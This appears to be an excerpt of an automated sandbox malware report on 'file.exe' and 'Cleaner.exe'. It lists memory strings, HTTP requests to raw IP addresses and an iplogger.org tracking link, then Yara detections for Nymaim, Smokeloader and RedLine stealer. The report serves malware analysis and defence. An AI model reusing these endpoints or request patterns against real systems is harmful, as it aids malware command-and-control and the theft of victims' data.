                Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405489220.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.409086991.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405791697.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersrsivo
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: Cleaner.exe, 00000021.00000003.387130957.0000024B7E1C3000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.drString found in binary or memory: https://g-cleanit.hk
                Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org
                Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1Pz8p7
                Source: Cleaner.exe, 00000021.00000002.645456817.0000024B0040E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.orgx
                Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
                Source: unknownDNS traffic detected: queries for: iplogger.org
                Source: global trafficHTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: DHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: EHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49723 version: TLS 1.2

                E-Banking Fraud

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.3.file.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.22.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.14.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.28.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.24.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.20.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.32.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.28.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.32.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.20.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.26.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.26.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.24.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.30.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.18.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.30.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.18.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.22.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.292406498.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.307333691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.285914510.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.265875582.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.254096635.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.293499241.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.299464336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.260403586.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.270306154.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.271549614.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.261149123.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.265067890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.280355467.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.300281036.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.254941692.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.306082555.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.253262177.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.307807767.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.272012058.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.255218236.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.254552831.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.300504834.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.306335009.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.286527423.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.261493549.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.270666653.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.260670257.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.293688181.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.285114416.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.265318606.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
